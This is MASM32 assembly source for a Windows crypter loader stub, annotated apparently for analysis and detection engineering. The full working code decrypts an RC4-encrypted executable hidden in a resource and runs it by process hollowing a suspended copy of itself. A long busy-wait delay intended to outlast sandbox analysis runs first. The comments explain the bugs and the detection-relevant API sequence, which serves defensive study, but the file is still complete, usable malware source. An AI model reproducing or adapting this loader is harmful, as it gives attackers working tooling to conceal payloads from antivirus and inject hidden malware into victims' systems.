; Target: x86 (32-bit), MASM32, flat model, stdcall.
; Loader stub: RC4-decrypts a PE image stored as RCDATA resource 1212 and
; runs it by process hollowing (RunPE) a suspended copy of this executable
; (see ExtractFile). Kept here for analysis / detection engineering.
.386
.model flat, stdcall
option casemap:none                         ; symbol names are case-sensitive
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc         ; linked, but no shell32 call is visible in this file
include \masm32\include\ntdll.inc           ; ZwUnmapViewOfSection
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\ntdll.lib
.data
mPath byte 256 dup (0)                      ; this executable's own path (GetModuleFileName); size matches the 256 passed
password byte 'datpass', 0                  ; RC4 key, hard-coded in plaintext in .data: anyone holding the binary can
                                            ; recover it, so the payload "encryption" is obfuscation, not confidentiality
.data?
hInstance dword ?                           ; module handle of this process (GetModuleHandle(0))
loop_stopper dword ?                        ; countdown for the busy-wait at _entrypoint
ResInf dword ?                              ; pointer to the locked resource bytes; decrypted in place by Rc4_crypt
hResourceSize dword ?                       ; SizeofResource result, passed to Rc4_crypt as the byte count
rc4keytable db 256 dup (?)                  ; RC4 state S[0..255]; filled by Rc4_setkey, zeroed by Rc4_crypt after a non-empty buffer
;-----------------------------------------------------------------------
; Rc4_setkey(Pass, LenPass)              -- RC4 key schedule (KSA)
; ABI:   stdcall, 32-bit; all GPRs preserved via pushad/popad
; In:    Pass    = pointer to key bytes
;        LenPass = key length in bytes; must be >= 1 (a length of 0 is
;                  not handled: esi underflows and the key index keeps
;                  advancing past Pass). bl is 8-bit, so keys longer than
;                  256 bytes are indexed mod 256.
; Out:   rc4keytable = permuted S[0..255]; no register result
; Regs:  ecx = i (cl), eax = j (al, upper bits stay 0 so it is a valid index),
;        ebx = key byte index (bl), esi = key bytes left in this pass, edi = Pass
;-----------------------------------------------------------------------
Rc4_setkey proc Pass:DWORD, LenPass:DWORD
    pushad
    ; S[i] = i, written as 64 little-endian dwords from the top of the table down:
    ; 0FFFEFDFCh at offset 252 gives bytes FC,FD,FE,FF; each step subtracts 4 from every byte
    mov eax, 0FFFEFDFCh
    mov ecx, 256/4
Init_rc4keytable:
    mov dword ptr [rc4keytable+4*ecx-4], eax
    sub eax, 04040404h
    dec ecx
    jnz Init_rc4keytable                    ; leaves ecx = 0, i.e. i = 0 for the mixing loop
    xor eax, eax                            ; j = 0
    mov edi, Pass
Key_return:                                 ; (re)start the key at byte 0: key[k mod LenPass]
    xor ebx, ebx
    mov esi ,LenPass
    jmp New_key
Key_loop:
    inc bl                                  ; k++
    dec esi
    jz Key_return                           ; key exhausted -> wrap to key[0]
New_key:
    mov dl, byte ptr [rc4keytable+ecx]      ; dl = S[i]
    add al, byte ptr [edi+ebx]              ; j += key[k]
    add al, dl                              ; j += S[i]   (mod 256 via al)
    mov dh, byte ptr [rc4keytable+eax]      ; dh = S[j]
    mov byte ptr [rc4keytable+ecx], dh      ; swap S[i], S[j]
    mov byte ptr [rc4keytable+eax], dl
    inc cl                                  ; i++ ; cl wraps to 0 after i = 255 ...
    jnz Key_loop                            ; ... which ends the 256-iteration loop
    popad
    ret
Rc4_setkey endp
;-----------------------------------------------------------------------
; Rc4_crypt(iData, LenData)              -- RC4 PRGA, XOR in place
; ABI:   stdcall, 32-bit; all GPRs preserved via pushad/popad
; In:    iData   = buffer to en/decrypt in place
;        LenData = byte count; 0 returns without touching the buffer or S
; Out:   buffer XORed with the keystream. For LenData > 0 the state table
;        rc4keytable is zeroed afterwards, so Rc4_setkey must run again
;        before the next call.
; Regs:  ebx = i (bl), eax = j (al), edx = S[i] (dl), ecx = S[j] then the
;        keystream index (cl), esi = data pointer, edi = bytes left.
;        The xor-zeroing below keeps the upper 24 bits of eax/ebx/ecx at 0,
;        so the byte-sized updates yield valid table indices.
;-----------------------------------------------------------------------
Rc4_crypt proc iData:DWORD, LenData:DWORD
    pushad
    mov edi, LenData
    mov esi, iData
    test edi, edi
    jz Rc4_enc_exit                         ; empty buffer: nothing to do, S left intact
    xor eax, eax                            ; j = 0
    xor edx, edx
    xor ecx, ecx
    xor ebx, ebx                            ; i = 0
Rc4_enc_loop:
    inc bl                                  ; i = (i + 1) mod 256
    mov dl, byte ptr [rc4keytable+ebx]      ; dl = S[i]
    add al, dl                              ; j = (j + S[i]) mod 256
    mov cl, byte ptr [rc4keytable+eax]      ; cl = S[j]
    mov byte ptr [rc4keytable+ebx], cl      ; swap S[i], S[j]
    mov byte ptr [rc4keytable+eax], dl
    add cl, dl                              ; t = (S[i] + S[j]) mod 256
    mov cl, byte ptr [rc4keytable+ecx]      ; keystream byte K = S[t]
    xor byte ptr [esi], cl                  ; *p ^= K
    inc esi
    dec edi
    jnz Rc4_enc_loop
    ; Wipe the RC4 state: 64 zero dwords over rc4keytable (edi is reloaded, so the
    ; data pointer is gone; edi/ecx/eax are restored by popad anyway)
    xor eax, eax
    mov edi, offset rc4keytable
    mov ecx, 256/4
    cld
    rep stosd
Rc4_enc_exit:
    popad
    ret
Rc4_crypt endp
;-----------------------------------------------------------------------
; ExtractFile()                          -- decrypt resource 1212 and run it
;   by process hollowing (RunPE) a suspended copy of this executable
; ABI:   stdcall, 32-bit, no arguments, no meaningful return value
; Notes: ebx/esi/edi are used as scratch and never saved although stdcall
;        treats them as callee-saved; harmless here only because the single
;        caller calls ExitProcess right after. Past the three resource
;        checks, no Win32 return value is tested (CreateProcess, VirtualAllocEx,
;        WriteProcessMemory, SetThreadContext...). The decrypted bytes are
;        treated as a valid PE without any MZ/PE signature check.
; Detection view: CreateProcess(CREATE_SUSPENDED) -> GetThreadContext ->
;        ZwUnmapViewOfSection -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
;        WriteProcessMemory (headers, then each section) -> SetThreadContext
;        (EAX = new entry point) -> ResumeThread is the classic hollowing
;        sequence that EDR / ETW-based rules key on.
;-----------------------------------------------------------------------
ExtractFile proc
local hResource:dword                       ; HRSRC from FindResource
LOCAL sinfo: STARTUPINFO                    ; zero-filled STARTUPINFO for CreateProcess
LOCAL pinfo: PROCESS_INFORMATION            ; process/thread handles of the suspended child
LOCAL base: dword                           ; child address where the payload image is written
LOCAL sec: ptr IMAGE_SECTION_HEADER         ; first section header of the payload
LOCAL cnt: CONTEXT                          ; child main-thread context; only integer registers are fetched/set
    invoke GetModuleFileName, 0, offset mPath, 256          ; mPath = our own path: the hollowed child is a copy of this exe
    invoke GetModuleHandle, 0
    mov hInstance, eax
    invoke FindResource, hInstance, 1212, RT_RCDATA         ; encrypted payload lives in RCDATA resource id 1212
    .if eax != 0
        mov hResource, eax
        invoke SizeofResource, hInstance, hResource
        .if eax != 0
            mov hResourceSize, eax
            invoke LoadResource, hInstance, hResource
            .if eax != 0
                invoke LockResource, eax
                mov ResInf , eax                            ; ResInf -> resource bytes, decrypted in place below
                invoke lstrlen,addr password
                invoke Rc4_setkey,addr password,eax         ; key = the hard-coded 'datpass' string
                invoke Rc4_crypt,ResInf,hResourceSize       ; ResInf is now assumed to hold a plaintext PE image
                invoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
                invoke CreateProcess, offset mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
                invoke RtlZeroMemory, addr cnt, sizeof CONTEXT
                mov cnt.ContextFlags, CONTEXT_INTEGER
                invoke GetThreadContext, pinfo.hThread, addr cnt
                invoke GetModuleHandle, 0
                invoke ZwUnmapViewOfSection, pinfo.hProcess, eax  ; unmaps the child's image at OUR module base; assumes the child is mapped at the same address
                mov edi, ResInf
                add edi, IMAGE_DOS_HEADER.e_lfanew[edi]     ; edi -> payload IMAGE_NT_HEADERS
                assume edi: ptr IMAGE_NT_HEADERS
                invoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
                mov base, eax                               ; requested at the payload's preferred ImageBase; eax is not compared with ImageBase and no relocation processing exists in this file
                invoke WriteProcessMemory, pinfo.hProcess, base, ResInf , [edi].OptionalHeader.SizeOfHeaders, 0
                lea eax, [edi].OptionalHeader
                mov sec, eax
                movzx eax, [edi].FileHeader.SizeOfOptionalHeader
                add sec, eax                                ; sec = OptionalHeader + SizeOfOptionalHeader = first IMAGE_SECTION_HEADER
                xor eax, eax
                xor esi, esi                                ; esi = section index
                xor ecx, ecx
                .while ( si < [edi].FileHeader.NumberOfSections )
                    imul eax, esi, sizeof IMAGE_SECTION_HEADER
                    add eax, sec                            ; eax -> section header [esi]
                    mov ebx, base
                    add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]       ; destination in the child
                    mov edx, ResInf
                    add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]     ; source raw bytes in the decrypted image
                    invoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0
                    inc esi
                .endw
                mov eax, base
                add eax, [edi].OptionalHeader.AddressOfEntryPoint
                mov cnt.regEax, eax                         ; relies on x86 Windows starting a new process's first thread with EAX = image entry point
                invoke SetThreadContext, pinfo.hThread, addr cnt
                invoke ResumeThread, pinfo.hThread           ; child now executes the payload
                ret
            .endif
        .endif
    .endif
ExtractFile endp
;-----------------------------------------------------------------------
; _entrypoint: busy-wait, then run ExtractFile and exit.
; The 500,000,000-iteration loop does no useful work (the mov/push/pop of
; eax is filler) and presumably exists only to burn time before anything
; observable happens - a crude delay of the kind used to outlast short
; automated-analysis windows. The cmp result is never used: dec sets the
; flags that jg tests, so the loop runs until loop_stopper reaches 0.
;-----------------------------------------------------------------------
_entrypoint:
    mov loop_stopper,500000000
loop_start:
    mov eax,0                               ; filler; eax is not used by the loop
    push eax
    pop eax
    cmp loop_stopper, 0                     ; flags are overwritten by the dec below
    dec loop_stopper
    jg loop_start                           ; loop while (--loop_stopper) > 0 (signed)
    invoke ExtractFile                      ; no return value is checked; exits either way
    invoke ExitProcess, 0
end _entrypoint